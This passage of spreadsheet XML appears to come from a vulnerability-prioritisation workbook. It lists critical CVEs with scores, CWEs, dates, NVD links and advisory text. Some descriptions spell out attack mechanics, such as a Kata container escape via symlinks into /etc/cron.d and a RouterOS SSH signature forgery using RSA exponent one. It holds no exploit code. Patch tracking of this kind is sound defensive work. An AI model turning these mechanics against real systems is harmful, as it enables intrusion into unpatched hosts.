          <t>CVE-2026-89256</t>
        </is>
      </c>
      <c r="C555" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D555" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E555" s="5" t="inlineStr"/>
      <c r="F555" s="5" t="inlineStr"/>
      <c r="G555" s="5" t="inlineStr"/>
      <c r="H555" s="5" t="inlineStr"/>
      <c r="I555" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J555" s="5" t="inlineStr"/>
      <c r="K555" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L555" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the Bookmark plugin where chapter names are not encoded before being concatenated into public watch-page HTML. A video owner can inject malicious scripts via the bookmark name parameter, and every visitor of that video executes the payload in the AVideo origin.</t>
        </is>
      </c>
      <c r="M555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89256</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89258</t>
        </is>
      </c>
      <c r="C556" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D556" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E556" s="5" t="inlineStr"/>
      <c r="F556" s="5" t="inlineStr"/>
      <c r="G556" s="5" t="inlineStr"/>
      <c r="H556" s="5" t="inlineStr"/>
      <c r="I556" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J556" s="5" t="inlineStr"/>
      <c r="K556" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L556" s="5" t="inlineStr">
        <is>
          <t>Hugo is a static site generator. In versions after v0.123.0 and before v0.165.0, symlinks in parent directories were not dropped during direct resource lookups, allowing path confinement to be bypassed. An attacker who can place — or who convinces a site author to place — a symlink inside a mounted directory (for example, in a locally vendored theme under themes/) can cause functions that perform direct lookups, such as resources.Get and os.ReadFile, to follow that symlink and read files outside the intended project boundaries, disclosing their contents in the built site. Themes mounted as Go modules fetched from GitHub have symlinks stripped on download and are not affected, and multi-directory walks (e.g. content/asset walking) are not affected. This issue is an incomplete-fix follow-up to GHSA-c3wq-j5vh-68rc and GHSA-fw87-fv5r-9fpw; it is fixed in v0.165.0.</t>
        </is>
      </c>
      <c r="M556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89258</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89259</t>
        </is>
      </c>
      <c r="C557" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D557" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E557" s="5" t="inlineStr"/>
      <c r="F557" s="5" t="inlineStr"/>
      <c r="G557" s="5" t="inlineStr"/>
      <c r="H557" s="5" t="inlineStr"/>
      <c r="I557" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J557" s="5" t="inlineStr"/>
      <c r="K557" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L557" s="5" t="inlineStr">
        <is>
          <t>Hugo is a static site generator. From v0.161.0, Hugo executes Node tools under Node's permission model, but TailwindCSS — included in the default security.exec.allow list — requires a highly permissive configuration (--allow-addons, --allow-child-process, --allow-worker). As a result, the restrictions intended by the fix for GHSA-x597-9fr4-5857 could still be bypassed, allowing a Node tool invoked during a build to read and write files outside the project's working directory. Affected versions are those after v0.43; the issue was fixed in v0.165.0 by removing tailwindcss from the default security.exec.allow list. Users who do not use TailwindCSS, or who only build trusted sites, are not affected. As a workaround, users can define a restrictive security.exec.allow list in hugo.toml.</t>
        </is>
      </c>
      <c r="M557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89259</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13737</t>
        </is>
      </c>
      <c r="C558" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D558" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E558" s="5" t="inlineStr"/>
      <c r="F558" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G558" s="5" t="inlineStr"/>
      <c r="H558" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="I558" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J558" s="5" t="inlineStr"/>
      <c r="K558" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L558" s="5" t="inlineStr">
        <is>
          <t>CommServe contained an allowlist bypass vulnerability affecting command execution authorization.  Software customers upgrade to resolved maintenance release. Update all Commvault installations, including Commserve, Webserver, Command Center, Media Agents, Clients and HyperScale X.</t>
        </is>
      </c>
      <c r="M558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13737</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13745</t>
        </is>
      </c>
      <c r="C559" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D559" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E559" s="5" t="inlineStr"/>
      <c r="F559" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G559" s="5" t="inlineStr"/>
      <c r="H559" s="5" t="inlineStr"/>
      <c r="I559" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J559" s="5" t="inlineStr"/>
      <c r="K559" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-78</t>
        </is>
      </c>
      <c r="L559" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Gemini CLI and associated GitHub Action allowed an unprivileged attacker to achieve an arbitrary code execution in Gemini CLI via untrusted local .env files overriding GEMINI_CLI_HOME.</t>
        </is>
      </c>
      <c r="M559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13745</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21095</t>
        </is>
      </c>
      <c r="C560" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D560" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E560" s="5" t="inlineStr"/>
      <c r="F560" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G560" s="5" t="inlineStr"/>
      <c r="H560" s="5" t="inlineStr"/>
      <c r="I560" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J560" s="5" t="inlineStr"/>
      <c r="K560" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L560" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in DNG decoder of libimagecodec.quram.so prior to SMR Sep-2026 Release 1 allows remote attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="M560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21095</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21096</t>
        </is>
      </c>
      <c r="C561" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D561" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E561" s="5" t="inlineStr"/>
      <c r="F561" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G561" s="5" t="inlineStr"/>
      <c r="H561" s="5" t="inlineStr"/>
      <c r="I561" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J561" s="5" t="inlineStr"/>
      <c r="K561" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L561" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in JPEG decoder of libimagecodec.quram.so prior to SMR Sep-2026 Release 1 allows remote attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="M561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21096</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39923</t>
        </is>
      </c>
      <c r="C562" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D562" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E562" s="5" t="inlineStr"/>
      <c r="F562" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G562" s="5" t="inlineStr"/>
      <c r="H562" s="5" t="inlineStr"/>
      <c r="I562" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J562" s="5" t="inlineStr"/>
      <c r="K562" s="5" t="inlineStr">
        <is>
          <t>CWE-324</t>
        </is>
      </c>
      <c r="L562" s="5" t="inlineStr">
        <is>
          <t>Flarum before 1.8.16 contains a password reset token expiry bypass vulnerability that allows unauthenticated attackers to reuse expired password reset tokens by submitting them directly to the reset processing endpoint. The SavePasswordController::handle() method calls PasswordToken::findOrFail() without performing any expiry validation, allowing attackers to bypass the 24-hour token lifetime enforced only during form rendering and change any account's password to gain an authenticated session.</t>
        </is>
      </c>
      <c r="M562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39923</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42945</t>
        </is>
      </c>
      <c r="C563" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D563" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E563" s="5" t="inlineStr"/>
      <c r="F563" s="5" t="n">
        <v>0.68</v>
      </c>
      <c r="G563" s="5" t="inlineStr">
        <is>
          <t>f5, nginx</t>
        </is>
      </c>
      <c r="H563" s="5" t="inlineStr">
        <is>
          <t>f5:dos, f5:nginx_gateway_fabric, f5:nginx_ingress_controller, f5:nginx_instance_manager, f5:nginx_open_source, f5:nginx_plus, f5:waf</t>
        </is>
      </c>
      <c r="I563" s="5" t="inlineStr">
        <is>
          <t>2026-05-13</t>
        </is>
      </c>
      <c r="J563" s="5" t="inlineStr"/>
      <c r="K563" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-131</t>
        </is>
      </c>
      <c r="L563" s="5" t="inlineStr">
        <is>
          <t>NGINX Plus and NGINX Open Source have a vulnerability in the ngx_http_rewrite_module module. This vulnerability exists when the rewrite directive is followed by a rewrite, if, or set directive and an unnamed Perl-Compatible Regular Expression (PCRE) capture (for example, $1, $2) with a replacement string that includes a question mark (?). An unauthenticated attacker along with conditions beyond its control can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, attackers can execute code on systems with Address Space Layout Randomization (ASLR) disabled or when the attacker can bypass ASLR.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.</t>
        </is>
      </c>
      <c r="M563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42945</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46713</t>
        </is>
      </c>
      <c r="C564" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D564" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E564" s="5" t="inlineStr"/>
      <c r="F564" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G564" s="5" t="inlineStr"/>
      <c r="H564" s="5" t="inlineStr"/>
      <c r="I564" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J564" s="5" t="inlineStr"/>
      <c r="K564" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L564" s="5" t="inlineStr">
        <is>
          <t>Misskey is an open source, federated social media platform. Versions 12.37.0 and later, but prior to 2026.5.4, contain a vulnerability in the JSON-LD signature validation and compaction process that allows spoofed activities to be accepted as valid. This issue has been fixed in version 2026.5.4.</t>
        </is>
      </c>
      <c r="M564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46713</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47243</t>
        </is>
      </c>
      <c r="C565" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D565" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E565" s="5" t="inlineStr"/>
      <c r="F565" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G565" s="5" t="inlineStr"/>
      <c r="H565" s="5" t="inlineStr"/>
      <c r="I565" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J565" s="5" t="inlineStr"/>
      <c r="K565" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-36</t>
        </is>
      </c>
      <c r="L565" s="5" t="inlineStr">
        <is>
          <t>Kata Containers is an open source project focusing on a standard implementation of lightweight Virtual Machines (VMs) that perform like containers. Prior to 3.31.0, the runtime-rs standalone virtio-fs path is vulnerable to a guest-root to host-root escape. In this configuration, Kata runs the host virtiofsd as root with --sandbox none --seccomp none, so an attacker with root-equivalent access inside the guest can bypass the guest virtio-fs client entirely by taking over the virtio-fs PCI device and building a virtqueue in userspace to submit raw FUSE requests directly to the host virtiofsd. A crafted FUSE_SYMLINK request whose new symlink name is an absolute host path is honored outside the configured shared directory, allowing guest root to create root-owned symlinks in sensitive host locations such as /etc/cron.d. By pointing such a symlink at a guest-controlled crontab payload reachable through a live runtime process's mount namespace, the attacker causes the host cron daemon to execute that payload as host root, crossing the Kata isolation boundary. This issue is fixed in version 3.31.0.</t>
        </is>
      </c>
      <c r="M565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47243</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47839</t>
        </is>
      </c>
      <c r="C566" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D566" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E566" s="5" t="inlineStr"/>
      <c r="F566" s="5" t="inlineStr"/>
      <c r="G566" s="5" t="inlineStr"/>
      <c r="H566" s="5" t="inlineStr"/>
      <c r="I566" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J566" s="5" t="inlineStr"/>
      <c r="K566" s="5" t="inlineStr"/>
      <c r="L566" s="5" t="inlineStr">
        <is>
          <t>A vulnerability allows users authenticating through a federated OIDC provider to obtain the uaa.admin scope despite operators restricting that provider through externalGroupsWhitelist configuration. The issue occurs specifically when an OIDC identity provider uses groupMappingMode: AS_SCOPES with a wildcard externalGroupsWhitelist entry.</t>
        </is>
      </c>
      <c r="M566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47839</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53790</t>
        </is>
      </c>
      <c r="C567" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D567" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E567" s="5" t="inlineStr"/>
      <c r="F567" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G567" s="5" t="inlineStr"/>
      <c r="H567" s="5" t="inlineStr"/>
      <c r="I567" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J567" s="5" t="inlineStr"/>
      <c r="K567" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-88</t>
        </is>
      </c>
      <c r="L567" s="5" t="inlineStr">
        <is>
          <t>rsync before 3.5.0 contains multiple command and argument injection vulnerabilities that allow attackers to execute arbitrary commands by supplying malicious input through several code paths, including the RSYNC_CONNECT_PROG environment variable, daemon hooks, the rsync-ssl wrapper, and remote-shell command newline injection. Attackers can inject shell metacharacters or newline characters into unsanitized user-supplied values such as hostnames and hostspecs to execute arbitrary commands under the privileges of the rsync process or the invoking user.</t>
        </is>
      </c>
      <c r="M567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53790</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59679</t>
        </is>
      </c>
      <c r="C568" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D568" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E568" s="5" t="inlineStr"/>
      <c r="F568" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G568" s="5" t="inlineStr"/>
      <c r="H568" s="5" t="inlineStr"/>
      <c r="I568" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J568" s="5" t="inlineStr"/>
      <c r="K568" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L568" s="5" t="inlineStr">
        <is>
          <t>fs_read_glyphs() in the libXfont2 font-server client (src/fc/fserve.c) indexes the per-character encoding[] array using num_chars from the FS_QueryXBitmaps16 reply, but that array was allocated with a size derived from num_extents in the separate FS_QueryXExtents16 reply. The two CARD32 fields are never cross-checked.
A malicious or compromised font server can send a small num_extents (e.g. 1) in the extents reply, then a large num_chars (e.g. 100000) in the bitmaps reply. This causes attacker-controlled out-of-bounds heap read and writes.</t>
        </is>
      </c>
      <c r="M568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59679</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63382</t>
        </is>
      </c>
      <c r="C569" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D569" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E569" s="5" t="inlineStr"/>
      <c r="F569" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G569" s="5" t="inlineStr"/>
      <c r="H569" s="5" t="inlineStr"/>
      <c r="I569" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J569" s="5" t="inlineStr"/>
      <c r="K569" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L569" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, the libevent evhttp parser in http.c inconsistently handles duplicate Transfer-Encoding headers, comma-separated Transfer-Encoding values, and bare line feeds in chunked framing. evhttp_find_header can select only the first header, evhttp_check_transfer_encoding_ was absent so the previous whole-string comparison fails to recognize valid lists ending in chunked, and evhttp_handle_chunked_read uses EVBUFFER_EOL_CRLF rather than EVBUFFER_EOL_CRLF_STRICT, accepting bare LF chunk terminators. When libevent is deployed behind a proxy that frames the same request differently, an unauthenticated remote attacker can desynchronize request boundaries and smuggle a second request, potentially bypassing access controls or poisoning caches. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="M569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63382</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63385</t>
        </is>
      </c>
      <c r="C570" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D570" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E570" s="5" t="inlineStr"/>
      <c r="F570" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G570" s="5" t="inlineStr"/>
      <c r="H570" s="5" t="inlineStr"/>
      <c r="I570" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J570" s="5" t="inlineStr"/>
      <c r="K570" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L570" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent has two HTTP parsing weaknesses in http.c. evhttp_decode_uri_internal decodes percent-encoded %00 bytes into literal NUL characters, which can cause downstream C string operations to truncate a path and bypass validation performed on a different representation. evhttp_header_is_valid_value also accepts obsolete line folding in header values containing carriage return or line feed characters, allowing a proxy and libevent to interpret headers differently and enabling header injection or access control bypass. The CRLF header acceptance is fixed in versions 2.1.13 and 2.2.2-alpha, but the reviewed patches do not clearly remediate the URI NUL-truncation condition.</t>
        </is>
      </c>
      <c r="M570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63385</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65638</t>
        </is>
      </c>
      <c r="C571" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D571" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E571" s="5" t="inlineStr"/>
      <c r="F571" s="5" t="inlineStr"/>
      <c r="G571" s="5" t="inlineStr"/>
      <c r="H571" s="5" t="inlineStr"/>
      <c r="I571" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J571" s="5" t="inlineStr"/>
      <c r="K571" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L571" s="5" t="inlineStr">
        <is>
          <t>Improper escaping of a request URL in  ConfigServer Security &amp; Firewall allows an unauthenticated remote attacker to execute arbitrary commands as the CSF service account via shell command injection.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M571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65638</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66047</t>
        </is>
      </c>
      <c r="C572" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D572" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E572" s="5" t="inlineStr"/>
      <c r="F572" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G572" s="5" t="inlineStr"/>
      <c r="H572" s="5" t="inlineStr"/>
      <c r="I572" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J572" s="5" t="inlineStr"/>
      <c r="K572" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-330</t>
        </is>
      </c>
      <c r="L572" s="5" t="inlineStr">
        <is>
          <t>ProfilePress (wp-user-avatar) WordPress plugin before 4.17.2 contains an unauthenticated remote code execution vulnerability that allows unauthenticated attackers to install and activate arbitrary plugins by brute-forcing a weak 32-bit connect token via the ppress_connect_process AJAX handler. Attackers can supply a caller-controlled URL through the file request parameter to trigger silent plugin installation and activation, achieving PHP code execution as the web-server user.</t>
        </is>
      </c>
      <c r="M572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66047</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67276</t>
        </is>
      </c>
      <c r="C573" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D573" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E573" s="5" t="inlineStr"/>
      <c r="F573" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G573" s="5" t="inlineStr"/>
      <c r="H573" s="5" t="inlineStr"/>
      <c r="I573" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J573" s="5" t="inlineStr"/>
      <c r="K573" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L573" s="5" t="inlineStr">
        <is>
          <t>RouterOS does not compare the complete RSA public key when matching an SSH authentication request to an authorized user key, checking the key type and modulus but omitting the exponent. Because signature verification uses the client-supplied key, an attacker knowing an authorized RSA modulus can supply a key with exponent one, forge a valid signature, and open an SSH command channel as the target user without the private key.This issue affects only 7.x branch was fixed in versions: 7.23.4 (Long-term) and 7.24.2 (Stable)</t>
        </is>
      </c>
      <c r="M573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67276</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67367</t>
        </is>
      </c>
      <c r="C574" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D574" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E574" s="5" t="inlineStr"/>
      <c r="F574" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G574" s="5" t="inlineStr"/>
      <c r="H574" s="5" t="inlineStr"/>
      <c r="I574" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J574" s="5" t="inlineStr"/>
      <c r="K574" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L574" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in SIMOVE Fleetmanager V3.1 (All versions &lt; V3.1.13), SIMOVE Fleetmanager V3.2 (All versions &lt; V3.2.4), SIMOVE Fleetmanager V3.3 (All versions &lt; V3.3.2), SIMOVE Fleetmanager V4.0 (All versions &lt; V4.0.1), SIPLANT V1.7 (All versions), SIPLANT V2.2 (All versions), SIPLANT V3.0 (All versions), SIPLANT V3.1 (All versions &lt; V3.1.4). Affected devices do not properly validate and neutralize directory traversal sequences in the file-serving endpoint of the embedded HTTP server. This could allow an unauthenticated remote attacker to read arbitrary files from the underlying operating system without any credentials, potentially exposing sensitive data such as credential stores, private keys, and configuration secrets.</t>
        </is>
      </c>
      <c r="M574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67367</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67402</t>
        </is>
      </c>
      <c r="C575" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D575" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E575" s="5" t="inlineStr"/>
      <c r="F575" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G575" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H575" s="5" t="inlineStr"/>
      <c r="I575" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
